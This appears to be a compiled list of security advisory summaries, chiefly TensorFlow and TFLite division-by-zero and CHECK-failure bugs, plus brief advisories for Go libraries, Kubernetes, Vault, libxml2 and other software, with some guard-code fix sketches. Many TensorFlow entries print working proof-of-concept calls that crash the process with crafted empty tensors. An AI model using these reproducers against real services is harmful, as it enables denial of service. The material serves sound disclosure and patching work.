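A hedged sketch of how the computation above could reject zero-sized indices dimensions before they make prefix_dim_size zero; identifiers mirror the snippet above and are illustrative rather than the exact upstream patch.
int prefix_dim_size = 1;
for (int i = 0; i < op_context.axis; ++i) {
  // Reject any zero-sized dimension instead of letting it zero out the product.
  TF_LITE_ENSURE(context, op_context.indices->dims->data[i] != 0);
  prefix_dim_size *= op_context.indices->dims->data[i];
}
TF_LITE_ENSURE(context, prefix_dim_size != 0);
const int suffix_dim_size = NumElements(op_context.indices) / prefix_dim_size;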
The reference implementation of the GatherNd TFLite operator is vulnerable to a division by zero error: ret.dims_to_count[i] = remain_flat_size / params_shape.Dims(i); An attacker can craft a model such that params input would be an empty tensor. In turn, params_shape.Dims(.) would be zero, in at least one dimension.
The implementation of the EmbeddingLookup TFLite operator is vulnerable to a division by zero error: const int row_size = SizeOfDimension(value, 0); const int row_bytes = value->bytes / row_size; An attacker can craft a model such that the first dimension of the value input is 0.
The implementation of the DepthwiseConv TFLite operator is vulnerable to a division by zero error: int num_input_channels = SizeOfDimension(input, 3); TF_LITE_ENSURE_EQ(context, num_filter_channels % num_input_channels, 0); An attacker can craft a model such that input's fourth dimension would be 0.
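For illustration, a guard such as the following before the modulo would avoid the division by zero; this is a sketch that reuses the identifiers above, not the exact upstream fix.
int num_input_channels = SizeOfDimension(input, 3);
// A zero channel count would make the modulo below divide by zero.
TF_LITE_ENSURE(context, num_input_channels != 0);
TF_LITE_ENSURE_EQ(context, num_filter_channels % num_input_channels, 0);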
The implementation of the DepthToSpace TFLite operator is vulnerable to a division by zero error: const int block_size = params->block_size; … const int input_channels = input->dims->data[3]; … int output_channels = input_channels / block_size / block_size; An attacker can craft a model such that params->block_size is 0.
The implementation of the BatchToSpaceNd TFLite operator is vulnerable to a division by zero error: TF_LITE_ENSURE_EQ(context, output_batch_size % block_shape[dim], 0); output_batch_size = output_batch_size / block_shape[dim]; An attacker can craft a model such that one dimension of the block input is 0. Hence, the corresponding value in block_shape is 0.
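A minimal sketch of a per-dimension guard that would reject a zero block_shape entry before the division above; it reuses the snippet's identifiers and is not necessarily the exact upstream fix.
// Hypothetical guard inside the loop over dimensions.
TF_LITE_ENSURE(context, block_shape[dim] != 0);
TF_LITE_ENSURE_EQ(context, output_batch_size % block_shape[dim], 0);
output_batch_size = output_batch_size / block_shape[dim];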
TFLite's convolution code has multiple divisions where the divisor is controlled by the user and not checked to be non-zero. For example: const int input_size = NumElements(input) / SizeOfDimension(input, 0);
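As an illustration, the division shown above could be guarded as follows, assuming a TfLiteContext* named context is in scope as in the other TFLite kernels; this is a sketch rather than the exact upstream fix.
// Reject an empty batch dimension before using it as a divisor.
TF_LITE_ENSURE(context, SizeOfDimension(input, 0) != 0);
const int input_size = NumElements(input) / SizeOfDimension(input, 0);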
The TFLite helper that computes the output size after padding, ComputeOutSize, does not check that the stride argument is non-zero before dividing. inline int ComputeOutSize(TfLitePadding padding, int image_size, int filter_size, int stride, int dilation_rate = 1) { int effective_filter_size = (filter_size - 1) * dilation_rate + 1; switch (padding) { case kTfLitePaddingSame: return (image_size + stride - 1) / stride; case kTfLitePaddingValid: return (image_size + stride - effective_filter_size) …
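A minimal sketch of a guarded variant of the helper, assuming the same signature as the snippet above; the hypothetical name ComputeOutSizeSafe and the choice to return 0 on a zero stride are illustrative, not the upstream fix.
// Returns 0 instead of dividing by zero when the stride is invalid.
inline int ComputeOutSizeSafe(TfLitePadding padding, int image_size,
                              int filter_size, int stride,
                              int dilation_rate = 1) {
  if (stride == 0) return 0;  // refuse to divide by zero
  int effective_filter_size = (filter_size - 1) * dilation_rate + 1;
  switch (padding) {
    case kTfLitePaddingSame:
      return (image_size + stride - 1) / stride;
    case kTfLitePaddingValid:
      return (image_size + stride - effective_filter_size) / stride;
    default:
      return 0;
  }
}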
Optimized pooling implementations in TFLite fail to check that the stride arguments are not 0 before calling ComputePaddingHeightWidth. Since users can craft special models which will have params->stride_{height,width} be zero, this will result in a division by zero.
A malicious user could trigger a division by 0 in the Conv3D implementation: import tensorflow as tf input_tensor = tf.constant([], shape=[0, 0, 0, 0, 0], dtype=tf.float32) filter_tensor = tf.constant([], shape=[0, 0, 0, 0, 0], dtype=tf.float32) tf.raw_ops.Conv3D(input=input_tensor, filter=filter_tensor, strides=[1, 56, 56, 56, 1], padding='VALID', data_format='NDHWC', dilations=[1, 1, 1, 23, 1])
An attacker can cause a division by zero to occur in Conv2DBackpropFilter: import tensorflow as tf input_tensor = tf.constant([], shape=[0, 0, 0, 0], dtype=tf.float32) filter_sizes = tf.constant([0, 0, 0, 0], shape=[4], dtype=tf.int32) out_backprop = tf.constant([], shape=[0, 0, 0, 0], dtype=tf.float32) tf.raw_ops.Conv2DBackpropFilter( input=input_tensor, filter_sizes=filter_sizes, out_backprop=out_backprop, strides=[1, 1, 1, 1], use_cudnn_on_gpu=False, padding='SAME', explicit_paddings=[], data_format='NHWC', dilations=[1, 1, 1, 1] )
An attacker can cause a denial of service via an FPE runtime error in tf.raw_ops.SparseMatMul: import tensorflow as tf a = tf.constant([100.0, 100.0, 100.0, 100.0], shape=[2, 2], dtype=tf.float32) b = tf.constant([], shape=[0, 2], dtype=tf.float32) tf.raw_ops.SparseMatMul( a=a, b=b, transpose_a=True, transpose_b=True, a_is_sparse=True, b_is_sparse=True) The division by 0 occurs deep in Eigen code because the b tensor is empty.
An attacker can cause a denial of service via an FPE runtime error in tf.raw_ops.Reverse: import tensorflow as tf tensor_input = tf.constant([], shape=[0, 1, 1], dtype=tf.int32) dims = tf.constant([False, True, False], shape=[3], dtype=tf.bool) tf.raw_ops.Reverse(tensor=tensor_input, dims=dims)
An attacker can trigger a division by 0 in tf.raw_ops.QuantizedMul: import tensorflow as tf x = tf.zeros([4, 1], dtype=tf.quint8) y = tf.constant([], dtype=tf.quint8) min_x = tf.constant(0.0) max_x = tf.constant(0.0010000000474974513) min_y = tf.constant(0.0) max_y = tf.constant(0.0010000000474974513) tf.raw_ops.QuantizedMul(x=x, y=y, min_x=min_x, max_x=max_x, min_y=min_y, max_y=max_y)
An attacker can trigger a division by 0 in tf.raw_ops.QuantizedConv2D: import tensorflow as tf input = tf.zeros([1, 1, 1, 1], dtype=tf.quint8) filter = tf.constant([], shape=[1, 0, 1, 1], dtype=tf.quint8) min_input = tf.constant(0.0) max_input = tf.constant(0.0001) min_filter = tf.constant(0.0) max_filter = tf.constant(0.0001) strides = [1, 1, 1, 1] padding = "SAME" tf.raw_ops.QuantizedConv2D(input=input, filter=filter, min_input=min_input, max_input=max_input, min_filter=min_filter, max_filter=max_filter, strides=strides, padding=padding)
An attacker can trigger undefined behavior via an integer division by zero in tf.raw_ops.QuantizedBiasAdd: import tensorflow as tf input_tensor = tf.constant([], shape=[0, 0, 0, 0], dtype=tf.quint8) bias = tf.constant([], shape=[0], dtype=tf.quint8) min_input = tf.constant(-10.0, dtype=tf.float32) max_input = tf.constant(-10.0, dtype=tf.float32) min_bias = tf.constant(-10.0, dtype=tf.float32) max_bias = tf.constant(-10.0, dtype=tf.float32) tf.raw_ops.QuantizedBiasAdd(input=input_tensor, bias=bias, min_input=min_input, max_input=max_input, min_bias=min_bias, max_bias=max_bias, out_type=tf.qint32)
An attacker can cause a runtime division by zero error and denial of service in tf.raw_ops.QuantizedBatchNormWithGlobalNormalization: import tensorflow as tf t = tf.constant([], shape=[0, 0, 0, 0], dtype=tf.quint8) t_min = tf.constant(-10.0, dtype=tf.float32) t_max = tf.constant(-10.0, dtype=tf.float32) m = tf.constant([], shape=[0], dtype=tf.quint8) m_min = tf.constant(-10.0, dtype=tf.float32) m_max = tf.constant(-10.0, dtype=tf.float32) v = tf.constant([], shape=[0], dtype=tf.quint8) v_min = tf.constant(-10.0, dtype=tf.float32) v_max = tf.constant(-10.0, dtype=tf.float32) beta = tf.constant([], shape=[0], dtype=tf.quint8) beta_min = tf.constant(-10.0, …
An attacker can cause a runtime division by zero error and denial of service in tf.raw_ops.QuantizedAdd: import tensorflow as tf x = tf.constant([68, 228], shape=[2, 1], dtype=tf.quint8) y = tf.constant([], shape=[2, 0], dtype=tf.quint8) min_x = tf.constant(10.723421015884028) max_x = tf.constant(15.19578006631113) min_y = tf.constant(-5.539003866682977) max_y = tf.constant(42.18819949559947) tf.raw_ops.QuantizedAdd(x=x, y=y, min_x=min_x, max_x=max_x, min_y=min_y, max_y=max_y)
The implementation of tf.raw_ops.MaxPoolGradWithArgmax is vulnerable to a division by 0: import tensorflow as tf input = tf.constant([], shape=[0, 0, 0, 0], dtype=tf.float32) grad = tf.constant([], shape=[0, 0, 0, 0], dtype=tf.float32) argmax = tf.constant([], shape=[0], dtype=tf.int64) ksize = [1, 1, 1, 1] strides = [1, 1, 1, 1] tf.raw_ops.MaxPoolGradWithArgmax( input=input, grad=grad, argmax=argmax, ksize=ksize, strides=strides, padding='SAME', include_batch_in_index=False)
An attacker can cause a denial of service via an FPE runtime error in tf.raw_ops.FusedBatchNorm: import tensorflow as tf x = tf.constant([], shape=[1, 1, 1, 0], dtype=tf.float32) scale = tf.constant([], shape=[0], dtype=tf.float32) offset = tf.constant([], shape=[0], dtype=tf.float32) mean = tf.constant([], shape=[0], dtype=tf.float32) variance = tf.constant([], shape=[0], dtype=tf.float32) epsilon = 0.0 exponential_avg_factor = 0.0 data_format = "NHWC" is_training = False tf.raw_ops.FusedBatchNorm( x=x, scale=scale, offset=offset, mean=mean, variance=variance, epsilon=epsilon, exponential_avg_factor=exponential_avg_factor, data_format=data_format, is_training=is_training)
An attacker can cause a runtime division by zero error and denial of service in tf.raw_ops.FractionalAvgPool: import tensorflow as tf value = tf.constant([60], shape=[1, 1, 1, 1], dtype=tf.int32) pooling_ratio = [1.0, 1.0000014345305555, 1.0, 1.0] pseudo_random = False overlapping = False deterministic = False seed = 0 seed2 = 0 tf.raw_ops.FractionalAvgPool( value=value, pooling_ratio=pooling_ratio, pseudo_random=pseudo_random, overlapping=overlapping, deterministic=deterministic, seed=seed, seed2=seed2)
An attacker can cause a denial of service via an FPE runtime error in tf.raw_ops.DenseCountSparseOutput: import tensorflow as tf values = tf.constant([], shape=[0, 0], dtype=tf.int64) weights = tf.constant([]) tf.raw_ops.DenseCountSparseOutput( values=values, weights=weights, minlength=-1, maxlength=58, binary_output=True)
The tf.raw_ops.Conv3DBackprop* operations fail to validate that the input tensors are not empty. In turn, this would result in a division by 0: import tensorflow as tf input_sizes = tf.constant([0, 0, 0, 0, 0], shape=[5], dtype=tf.int32) filter_tensor = tf.constant([], shape=[0, 0, 0, 1, 0], dtype=tf.float32) out_backprop = tf.constant([], shape=[0, 0, 0, 0, 0], dtype=tf.float32) tf.raw_ops.Conv3DBackpropInputV2(input_sizes=input_sizes, filter=filter_tensor, out_backprop=out_backprop, strides=[1, 1, 1, 1, 1], padding='SAME', data_format='NDHWC', dilations=[1, 1, 1, 1, 1]) import …
An attacker can trigger a division by 0 in tf.raw_ops.Conv2DBackpropInput: import tensorflow as tf input_tensor = tf.constant([52, 1, 1, 5], shape=[4], dtype=tf.int32) filter_tensor = tf.constant([], shape=[0, 1, 5, 0], dtype=tf.float32) out_backprop = tf.constant([], shape=[52, 1, 1, 0], dtype=tf.float32) tf.raw_ops.Conv2DBackpropInput(input_sizes=input_tensor, filter=filter_tensor, out_backprop=out_backprop, strides=[1, 1, 1, 1], use_cudnn_on_gpu=True, padding='SAME', explicit_paddings=[], data_format='NHWC', dilations=[1, 1, 1, 1])
An attacker can trigger a division by 0 in tf.raw_ops.Conv2DBackpropFilter: import tensorflow as tf input_tensor = tf.constant([], shape=[0, 0, 1, 0], dtype=tf.float32) filter_sizes = tf.constant([1, 1, 1, 1], shape=[4], dtype=tf.int32) out_backprop = tf.constant([], shape=[0, 0, 1, 1], dtype=tf.float32) tf.raw_ops.Conv2DBackpropFilter(input=input_tensor, filter_sizes=filter_sizes, out_backprop=out_backprop, strides=[1, 66, 18, 1], use_cudnn_on_gpu=True, padding='SAME', explicit_paddings=[], data_format='NHWC', dilations=[1, 1, 1, 1])
An attacker can trigger a division by 0 in tf.raw_ops.Conv2D: import tensorflow as tf input = tf.constant([], shape=[0, 0, 0, 0], dtype=tf.float32) filter = tf.constant([], shape=[0, 0, 0, 0], dtype=tf.float32) strides = [1, 1, 1, 1] padding = "SAME" tf.raw_ops.Conv2D(input=input, filter=filter, strides=strides, padding=padding)
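A hedged sketch of the kind of kernel-side shape validation (TensorFlow core C++ style) that would reject such empty inputs before any dimension is used as a divisor; the exact condition, error message, and placement in the real fix may differ.
// Hypothetical check inside the op kernel's Compute, where `context` is an
// OpKernelContext* and `filter` is the filter Tensor.
OP_REQUIRES(context, filter.NumElements() > 0,
            errors::InvalidArgument("filter must not be empty"));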
TensorFlow is an end-to-end open source platform for machine learning. The TFLite implementation of hashtable lookup is vulnerable to a division by zero error. An attacker can craft a model such that the first dimension of the value input would be 0. The fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 2.1.4, as these are also affected and still in …
TensorFlow is an end-to-end open source platform for machine learning. An attacker can cause a denial of service via an FPE runtime error in tf.raw_ops.SparseMatMul. The division by 0 occurs deep in Eigen code because the b tensor is empty. The fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 2.1.4, as these are also affected and …
Zope Products.CMFCore and Products.PluggableAuthService, as used in Plone and other products, allow Reflected XSS.
Passing a complex argument to tf.transpose while also passing conjugate=True results in a crash: import tensorflow as tf tf.transpose(conjugate=True, a=complex(1))
An attacker can cause a denial of service via CHECK-fail in tf.strings.substr with invalid arguments: import tensorflow as tf tf.strings.substr(input='abc', len=1, pos=[1,-1]) import tensorflow as tf tf.strings.substr(input='abc', len=1, pos=[1,2])
A vulnerability in Apache Flink (1.1.0 to 1.1.5, 1.2.0 to 1.2.1, 1.3.0 to 1.3.3, 1.4.0 to 1.4.2, 1.5.0 to 1.5.6, 1.6.0 to 1.6.4, 1.7.0 to 1.7.2, 1.8.0 to 1.8.3, 1.9.0 to 1.9.2, 1.10.0) where, when running a process with an enabled JMXReporter, with a port configured via metrics.reporter.<reporter_name>.port, an attacker with local access to the machine and JMX port can execute a man-in-the-middle attack using a specially crafted request to …
An attacker can cause a denial of service by controlling the values of the num_segments tensor argument for UnsortedSegmentJoin: import tensorflow as tf inputs = tf.constant([], dtype=tf.string) segment_ids = tf.constant([], dtype=tf.int32) num_segments = tf.constant([], dtype=tf.int32) separator = '' tf.raw_ops.UnsortedSegmentJoin( inputs=inputs, segment_ids=segment_ids, num_segments=num_segments, separator=separator)
An attacker can trigger a CHECK fail in PNG encoding by providing an empty input tensor as the pixel data: import tensorflow as tf image = tf.zeros([0, 0, 3]) image = tf.cast(image, dtype=tf.uint8) tf.raw_ops.EncodePng(image=image)
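For illustration, the abort could be avoided by returning a recoverable error instead of CHECK-failing on an empty image; this is a sketch in TensorFlow core C++ style, not the exact upstream fix.
// Hypothetical validation in the EncodePng kernel, where `context` is an
// OpKernelContext* and `image` is the input Tensor.
OP_REQUIRES(context, image.NumElements() > 0,
            errors::InvalidArgument("image must not be empty"));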
The API of tf.raw_ops.SparseCross allows combinations which would result in a CHECK-failure and denial of service: import tensorflow as tf hashed_output = False num_buckets = 1949315406 hash_key = 1869835877 out_type = tf.string internal_type = tf.string indices_1 = tf.constant([0, 6], shape=[1, 2], dtype=tf.int64) indices_2 = tf.constant([0, 0], shape=[1, 2], dtype=tf.int64) indices = [indices_1, indices_2] values_1 = tf.constant([0], dtype=tf.int64) values_2 = tf.constant([72], dtype=tf.int64) values = [values_1, values_2] batch_size = 4 shape_1 = …
An attacker can trigger a denial of service via a CHECK-fail in tf.raw_ops.SparseConcat: import tensorflow as tf import numpy as np indices_1 = tf.constant([[514, 514], [514, 514]], dtype=tf.int64) indices_2 = tf.constant([[514, 530], [599, 877]], dtype=tf.int64) indices = [indices_1, indices_2] values_1 = tf.zeros([0], dtype=tf.int64) values_2 = tf.zeros([0], dtype=tf.int64) values = [values_1, values_2] shape_1 = tf.constant([442, 514, 514, 515, 606, 347, 943, 61, 2], dtype=tf.int64) shape_2 = tf.zeros([9], dtype=tf.int64) shapes = [shape_1, …
An attacker can trigger a denial of service via a CHECK failure by passing an empty image to tf.raw_ops.DrawBoundingBoxes: import tensorflow as tf images = tf.fill([53, 0, 48, 1], 0.) boxes = tf.fill([53, 31, 4], 0.) boxes = tf.Variable(boxes) boxes[0, 0, 0].assign(3.90621) tf.raw_ops.DrawBoundingBoxes(images=images, boxes=boxes)
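For readability, the snippet above as a standalone sketch (same values, assuming an unpatched TensorFlow):

    import tensorflow as tf

    images = tf.fill([53, 0, 48, 1], 0.)          # empty image: the second dimension is zero
    boxes = tf.Variable(tf.fill([53, 31, 4], 0.))
    boxes[0, 0, 0].assign(3.90621)
    tf.raw_ops.DrawBoundingBoxes(images=images, boxes=boxes)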
An attacker can trigger a denial of service via a CHECK-fail in tf.raw_ops.AddManySparseToTensorsMap: import tensorflow as tf import numpy as np sparse_indices = tf.constant(530, shape=[1, 1], dtype=tf.int64) sparse_values = tf.ones([1], dtype=tf.int64) shape = tf.Variable(tf.ones([55], dtype=tf.int64)) shape[:8].assign(np.array([855, 901, 429, 892, 892, 852, 93, 96], dtype=np.int64)) tf.raw_ops.AddManySparseToTensorsMap(sparse_indices=sparse_indices, sparse_values=sparse_values, sparse_shape=shape)
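The reproducer above, reformatted as a runnable sketch (assumes a vulnerable TensorFlow build):

    import numpy as np
    import tensorflow as tf

    sparse_indices = tf.constant(530, shape=[1, 1], dtype=tf.int64)
    sparse_values = tf.ones([1], dtype=tf.int64)
    shape = tf.Variable(tf.ones([55], dtype=tf.int64))
    shape[:8].assign(np.array([855, 901, 429, 892, 892, 852, 93, 96], dtype=np.int64))
    tf.raw_ops.AddManySparseToTensorsMap(
        sparse_indices=sparse_indices,
        sparse_values=sparse_values,
        sparse_shape=shape)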
An attacker can cause a denial of service by exploiting a CHECK-failure coming from the implementation of tf.raw_ops.RFFT: import tensorflow as tf inputs = tf.constant([1], shape=[1], dtype=tf.float32) fft_length = tf.constant([0], shape=[1], dtype=tf.int32) tf.raw_ops.RFFT(input=inputs, fft_length=fft_length) The above example causes Eigen code to operate on an empty matrix. This triggers on an assertion and causes program termination.
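As a standalone sketch (same tensors as in the report, assuming an unpatched TensorFlow):

    import tensorflow as tf

    inputs = tf.constant([1], shape=[1], dtype=tf.float32)
    fft_length = tf.constant([0], shape=[1], dtype=tf.int32)  # zero-length FFT
    tf.raw_ops.RFFT(input=inputs, fft_length=fft_length)      # Eigen asserts on the empty matrix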
An attacker can cause a denial of service by exploiting a CHECK-failure coming from the implementation of tf.raw_ops.IRFFT: import tensorflow as tf values = [-10.0] * 130 values[0] = -9.999999999999995 inputs = tf.constant(values, shape=[10, 13], dtype=tf.float32) inputs = tf.cast(inputs, dtype=tf.complex64) fft_length = tf.constant([0], shape=[1], dtype=tf.int32) tf.raw_ops.IRFFT(input=inputs, fft_length=fft_length) The above example causes Eigen code to operate on an empty matrix. This triggers on an assertion and causes program termination.
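The IRFFT reproducer above, split into separate statements (assuming a vulnerable build):

    import tensorflow as tf

    values = [-10.0] * 130
    values[0] = -9.999999999999995
    inputs = tf.constant(values, shape=[10, 13], dtype=tf.float32)
    inputs = tf.cast(inputs, dtype=tf.complex64)
    fft_length = tf.constant([0], shape=[1], dtype=tf.int32)  # zero-length FFT
    tf.raw_ops.IRFFT(input=inputs, fft_length=fft_length)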
An attacker can trigger a denial of service via a CHECK-fail in tf.raw_ops.QuantizeAndDequantizeV4Grad: import tensorflow as tf gradient_tensor = tf.constant([0.0], shape=[1]) input_tensor = tf.constant([0.0], shape=[1]) input_min = tf.constant([[0.0]], shape=[1, 1]) input_max = tf.constant([[0.0]], shape=[1, 1]) tf.raw_ops.QuantizeAndDequantizeV4Grad( gradients=gradient_tensor, input=input_tensor, input_min=input_min, input_max=input_max, axis=0)
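A readable version of the snippet above (a sketch; assumes an unpatched TensorFlow):

    import tensorflow as tf

    gradient_tensor = tf.constant([0.0], shape=[1])
    input_tensor = tf.constant([0.0], shape=[1])
    input_min = tf.constant([[0.0]], shape=[1, 1])   # rank-2 min/max tensors trip the CHECK
    input_max = tf.constant([[0.0]], shape=[1, 1])
    tf.raw_ops.QuantizeAndDequantizeV4Grad(
        gradients=gradient_tensor,
        input=input_tensor,
        input_min=input_min,
        input_max=input_max,
        axis=0)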
An attacker can cause a denial of service by exploiting a CHECK-failure coming from tf.raw_ops.LoadAndRemapMatrix: import tensorflow as tf ckpt_path = tf.constant([], shape=[0], dtype=tf.string) old_tensor_name = tf.constant("") row_remapping = tf.constant([], shape=[0], dtype=tf.int64) col_remapping = tf.constant([1], shape=[1], dtype=tf.int64) initializing_values = tf.constant(1.0) tf.raw_ops.LoadAndRemapMatrix( ckpt_path=ckpt_path, old_tensor_name=old_tensor_name, row_remapping=row_remapping, col_remapping=col_remapping, initializing_values=initializing_values, num_rows=0, num_cols=1)
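The same reproducer as a standalone sketch (values taken verbatim from the report, assuming a vulnerable TensorFlow build):

    import tensorflow as tf

    ckpt_path = tf.constant([], shape=[0], dtype=tf.string)   # empty checkpoint path tensor
    old_tensor_name = tf.constant("")
    row_remapping = tf.constant([], shape=[0], dtype=tf.int64)
    col_remapping = tf.constant([1], shape=[1], dtype=tf.int64)
    initializing_values = tf.constant(1.0)
    tf.raw_ops.LoadAndRemapMatrix(
        ckpt_path=ckpt_path,
        old_tensor_name=old_tensor_name,
        row_remapping=row_remapping,
        col_remapping=col_remapping,
        initializing_values=initializing_values,
        num_rows=0,
        num_cols=1)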
An attacker can trigger a denial of service via a CHECK-fail in tf.raw_ops.CTCGreedyDecoder: import tensorflow as tf inputs = tf.constant([], shape=[18, 2, 0], dtype=tf.float32) sequence_length = tf.constant([-100, 17], shape=[2], dtype=tf.int32) merge_repeated = False tf.raw_ops.CTCGreedyDecoder(inputs=inputs, sequence_length=sequence_length, merge_repeated=merge_repeated)
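Reformatted as a runnable sketch (assuming an unpatched TensorFlow install):

    import tensorflow as tf

    inputs = tf.constant([], shape=[18, 2, 0], dtype=tf.float32)
    sequence_length = tf.constant([-100, 17], shape=[2], dtype=tf.int32)  # negative sequence length
    tf.raw_ops.CTCGreedyDecoder(inputs=inputs,
                                sequence_length=sequence_length,
                                merge_repeated=False)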
An attacker can trigger a denial of service via a CHECK-fail caused by an integer overflow in constructing a new tensor shape: import tensorflow as tf input_layer = 2**60-1 sparse_data = tf.raw_ops.SparseSplit( split_dim=1, indices=[(0, 0), (0, 1), (0, 2), (4, 3), (5, 0), (5, 1)], values=[1.0, 1.0, 1.0, 1.0, 1.0, 1.0], shape=(input_layer, input_layer), num_split=2, name=None )
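The snippet above as a standalone sketch (assuming a vulnerable TensorFlow build); the two huge shape dimensions overflow when multiplied while constructing the output shape:

    import tensorflow as tf

    input_layer = 2 ** 60 - 1   # dimensions this large overflow int64 when multiplied together
    tf.raw_ops.SparseSplit(
        split_dim=1,
        indices=[(0, 0), (0, 1), (0, 2), (4, 3), (5, 0), (5, 1)],
        values=[1.0, 1.0, 1.0, 1.0, 1.0, 1.0],
        shape=(input_layer, input_layer),
        num_split=2,
        name=None)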
Impact: Processes using tableflip may encounter hung goroutines in the parent process, after a failed upgrade. The Go runtime has annoying behaviour around setting and clearing O_NONBLOCK: exec.Cmd.Start() ends up calling os.File.Fd() for any file in exec.Cmd.ExtraFiles. os.File.Fd() disables the use of the runtime poller for the file and clears O_NONBLOCK from the underlying open file descriptor. This can lead to goroutines hanging in a parent process, after at …
OPC Foundation UA .NET Standard and OPC UA .NET Legacy are vulnerable to an uncontrolled recursion, which may allow an attacker to trigger a stack overflow.
Impact: Windows users using the sops direct editor option (sops file.yaml) can have a local executable named either vi, vim, or nano executed if running sops from cmd.exe. This attack is only viable if an attacker is able to place a malicious binary within the directory you are running sops from. In addition, this attack will only work when using cmd.exe or the Windows C library SearchPath function. This is …
This affects the package dns-packet. It creates buffers with allocUnsafe and does not always fill them before forming network packets. This can expose internal application memory over an unencrypted network when querying crafted invalid domain names.
Due to a bug in the code, it is possible for an attacker to craft a URL for the /new endpoint that redirects to any other URL.
GraphHopper is an open-source Java routing engine. In GraphHopper from version 2.0 and before version 2.4, there is a regular expression injection vulnerability that may lead to Denial of Service. This has been patched in 2.4 and 3.0. See this pull request for the fix: https://github.com/graphhopper/graphhopper/pull/2304
fastify-csrf is an open-source plugin that helps developers protect their Fastify server against CSRF attacks.
There is a flaw in the xml entity encoding functionality of libxml2. The most likely impact of this flaw is to application availability, with some potential impact to confidentiality and integrity if an attacker is able to use memory information to further exploit the application.
Impact: Missing input validation of some parameters on the endpoints used to confirm third-party identifiers could cause excessive use of disk space and memory leading to resource exhaustion. Patches: The issue is fixed by https://github.com/matrix-org/synapse/pull/9855. Workarounds: There are no known workarounds. References: n/a. For more information: If you have any questions or comments about this advisory, email us at security@matrix.org.
Adminer is open-source database management software. A cross-site scripting vulnerability in Adminer affects users of MySQL, MariaDB, PgSQL and SQLite. XSS is in most cases prevented by strict CSP in all modern browsers. The only exception is when Adminer is using a pdo_ extension to communicate with the database (it is used if the native extensions are not enabled). In browsers without CSP, affected versions of Adminer are vulnerable. As a …
A hard-coded cryptographic key vulnerability in the default configuration file was found in Kiali, all versions prior to 1.15.1. A remote attacker could abuse this flaw by creating their own JWT signed tokens and bypass Kiali authentication mechanisms, possibly gaining privileges to view and alter the Istio configuration.
The miekg Go DNS package before 1.1.25, as used in CoreDNS before 1.6.6 and other products, improperly generates random numbers because math/rand is used. The TXID becomes predictable, leading to response forgeries.
The proglottis Go wrapper before 0.1.1 for the GPGME library has a use-after-free, as demonstrated by use for container image pulls by Docker or CRI-O. This leads to a crash or potential code execution during GPG signature verification.
There's a flaw in libxml2. An attacker who is able to submit a crafted file to be processed by an application linked with libxml2 could trigger a use-after-free. The greatest impact from this flaw is to confidentiality, integrity, and availability.
An insufficient JWT validation vulnerability was found in Kiali versions 0.4.0 to 1.15.0 and was fixed in Kiali version 1.15.1, wherein a remote attacker could abuse this flaw by stealing a valid JWT cookie and using that to spoof a user session, possibly gaining privileges to view and alter the Istio configuration.
In Apache Thrift 0.9.3 to 0.12.0, a server implemented in Go using TJSONProtocol or TSimpleJSONProtocol may panic when fed invalid input data.
Rootless containers run with Podman receive all traffic with a source IP address of 127.0.0.1 (including from remote hosts). This impacts containerized applications that trust localhost (127.0.0.1) connections by default and do not require authentication. This issue affects Podman 1.8.0 onwards.
An issue was discovered in setTA in scan_rr.go in the Miek Gieben DNS library before 1.0.10 for Go. A dns.ParseZone() parsing error causes a segmentation violation, leading to denial of service.
routes/api/v1/api.go in Gogs 0.11.86 lacks permission checks for routes: deploy keys, collaborators, and hooks.
The x/text package before 0.3.3 for Go has a vulnerability in encoding/unicode that could lead to the UTF-16 decoder entering an infinite loop, causing the program to crash or run out of memory. An attacker could provide a single byte to a UTF16 decoder instantiated with UseBOM or ExpectBOM to trigger an infinite loop if the String function on the Decoder is called, or the Decoder is passed to golang.org/x/text/transform.String.
An integer overflow in NATS Server before 2.0.2 allows a remote attacker to crash the server by sending a crafted request. If authentication is enabled, then the remote attacker must have first authenticated.
The Elastic APM agent for Go versions before 1.11.0 can leak sensitive HTTP header information when logging the details during an application panic. Normally, the APM agent will sanitize sensitive HTTP header details before sending the information to the APM server. During an application panic it is possible the headers will not be sanitized before being sent.
Sensitive information written to a log file vulnerability was found in jaegertracing/jaeger before version 1.18.1 when the Kafka data store is used. This flaw allows an attacker with access to the container's log file to discover the Kafka credentials.
HashiCorp Vault and Vault Enterprise logged proxy environment variables that potentially included sensitive credentials. Fixed in 1.3.6 and 1.4.2.
A flaw was found in podman before 1.7.0. File permissions for non-root users running in a privileged container are not correctly checked. This flaw can be abused by a low-privileged user inside the container to access any other file in the container, even if owned by the root user inside the container. It does not allow directly escaping the container, though being a privileged container means that a lot …
Improper input validation in the Kubernetes API server in versions v1.0-1.12 and versions prior to v1.13.12, v1.14.8, v1.15.5, and v1.16.2 allows authorized users to send malicious YAML or JSON payloads, causing the API server to consume excessive CPU or memory, potentially crashing and becoming unavailable. Prior to v1.14.0, default RBAC policy authorized anonymous users to submit requests that could trigger this vulnerability. Clusters upgraded from a version prior to v1.14.0 …
HashiCorp Vault and Vault Enterprise 1.4.0 and 1.4.1, when configured with the GCP Secrets Engine, may incorrectly generate GCP Credentials with the default time-to-live lease duration instead of the engine-configured setting. This may lead to generated GCP credentials being valid for longer than intended. Fixed in 1.4.2.
In Gogs 0.11.91, MakeEmailPrimary in models/user_mail.go lacks a "not the owner of the email" check.
domain/section/markdown/markdown.go in Documize before 3.5.1 mishandles untrusted Markdown content. This was addressed by adding the bluemonday HTML sanitizer to defend against XSS.
Rancher 2 through 2.2.4 is vulnerable to a Cross-Site Websocket Hijacking attack that allows an exploiter to gain access to clusters managed by Rancher. The attack requires a victim to be logged into a Rancher server, and then to access a third-party site hosted by the exploiter. Once that is accomplished, the exploiter is able to execute commands against the cluster's Kubernetes API with the permissions and identity of the …
bluemonday before 1.0.5 allows XSS because certain Go lowercasing converts an uppercase Cyrillic character, defeating a protection mechanism against the "script" string.
The Kubernetes kubectl cp command in versions 1.1-1.12, and versions prior to 1.13.11, 1.14.7, and 1.15.4 allows a combination of two symlinks provided by tar output of a malicious container to place a file outside of the destination directory specified in the kubectl cp invocation. This could be used to allow an attacker to place a nefarious file using a symlink, outside of the destination tree.
This affects all versions of package github.com/u-root/u-root/pkg/tarutil. It is vulnerable to both leading and non-leading relative path traversal attacks in tar file extraction.
